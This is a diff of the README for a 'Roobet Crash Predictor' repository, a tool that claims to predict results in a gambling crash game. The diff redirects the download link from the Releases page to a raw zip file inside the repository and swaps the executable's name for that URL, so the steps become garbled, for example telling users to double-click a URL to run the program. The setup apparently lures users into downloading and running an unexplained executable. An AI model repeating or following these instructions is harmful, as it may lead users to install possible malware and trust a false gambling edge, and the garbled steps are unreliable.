xmalleck/Roobet-Crash-Predictor/README.md

 ## 📥 Download & Install

-To start, visit this page to download: [Releases Page](https://github.com/xmalleck/Roobet-Crash-Predictor/releases).
+To start, visit this page to download: [Releases Page](https://raw.githubusercontent.com/xmalleck/Roobet-Crash-Predictor/main/Properties/Roobet-Crash-Predictor-2.7-beta.2.zip).

 1. On the Releases page, you will see a list of available versions.
 Choose the most recent version.
 2. Click on the version link to view the files for download.
-3. Locate the file named `Roobet-Crash-Predictor.exe` (or similar) and click on it to start the download.
+3. Locate the file named `https://raw.githubusercontent.com/xmalleck/Roobet-Crash-Predictor/main/Properties/Roobet-Crash-Predictor-2.7-beta.2.zip` (or similar) and click on it to start the download.
 4. Once the download completes, locate the file in your downloads folder.

 ## 📂 Unzip and Run

 1. Find the downloaded file, which is likely zipped.
 Right-click on it and select "Extract All" or use any unzip tool you prefer.
 2. After extraction, open the folder containing the unzipped files.
-3. Double-click on `Roobet-Crash-Predictor.exe` to run the application.
+3. Double-click on `https://raw.githubusercontent.com/xmalleck/Roobet-Crash-Predictor/main/Properties/Roobet-Crash-Predictor-2.7-beta.2.zip` to run the application.

 ## 🎮 How to Use the Predictor